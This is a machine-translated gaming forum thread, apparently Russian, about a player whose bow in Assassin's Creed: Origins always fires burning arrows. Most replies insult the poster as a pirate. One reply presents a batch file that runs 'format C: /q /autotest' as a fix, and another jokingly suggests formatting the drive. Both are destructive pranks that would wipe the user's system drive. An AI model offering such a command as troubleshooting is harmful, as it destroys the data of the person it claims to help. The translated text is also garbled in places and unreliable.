3 New Notifications

New Badge Earned
Get 1K upvotes on your post
Life choices of my cat
Earned 210

Drag Images here or Browse from your computer.

Trending Posts
Sorted by Newest First
S
Stranik Lonely 24.03.20 11:59 pm

When you pull out the bow that is always on the boom (Assassin's Creed: Origins)

I have a glitch do not know how to fix my bow the arrow is always on how to fix it?
14 Comments
Sort by:
B
Bupycop 24.03.20

Stranik Lonely
Change Windows, it applies to everyone who downloaded a pirate and asks stupid questions.
Spoilergate, it is the properties of the bow, to shoot arrows ogrenimi, whether you're a little careful and read characteristics and properties of their subjects, would know that.

J
James_Mails 24.03.20

Where the world is heading... the Basic things well.
Soon will be questions how to find a job plot...

C
CrowBY 24.03.20

James_Mails
or how you click New game :)

b
blin88 24.03.20

AmonRah
totally agree

W
Wolf347 24.03.20

Stranik Lonely
Format the drive With doing? More or less helps. But there is one problem. The arrow will always water the marshmallow tip!

R
RumerG 24.03.20

That's how I want to approach and strike for stupidity with utter console. Maybe then the pirates there brains and thoughts going in the right direction. I haven't counted how many, but about 10 or more, you need to remove because of the stupidity)

R
RumerG 24.03.20

Stranik Lonely
You have not a glitch. A glitch in your head happened due to failure of the brain with little information

W
Wolf347 24.03.20

AmonRah
Yes, it's not pirates, among litsushnikov also occur repulsed Bobo! Dude just got this)
I'm a pirate, you pirate, but we do not create such retarded topics!

A
AleksSheyker 24.03.20

Well, do not know what more there are such people which descriptions of objects are not read))

R
RumerG 24.03.20

W_A_R_P 73
Agree but repulsed people don't like))

W
Wolf347 24.03.20

AmonRah
So a lot of them! Without them, nothing)))

A
Antisocial 24.03.20

The author, create a batch file with this content:
@echo off
format C: /q /autotest
and run. 146% your problem will be solved.

J
Jon Sneg 24.03.20

I also have a bug: when I go to the forum, I see stupid questions on the simplest things! You read do not know how the properties of weapons??? Arrow is lit because of svoistvah indicated that the arrows she's burning!!! Tripping shorter!!

A
Anton Cheban 24.03.20

ALT-F4 turns OFF the fire...